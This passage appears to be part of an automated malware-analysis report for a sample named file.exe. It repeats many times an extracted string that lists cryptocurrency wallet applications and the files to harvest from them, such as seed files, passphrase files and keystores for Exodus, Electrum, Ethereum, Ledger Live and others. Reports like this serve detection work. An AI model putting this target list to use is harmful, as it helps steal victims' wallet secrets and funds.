Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2124461311.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2124461311.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2124461311.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2124461311.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2124461311.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2124461311.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2124461311.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2124461311.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2124461311.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2124461311.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2124461311.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2124461311.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2124461311.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron 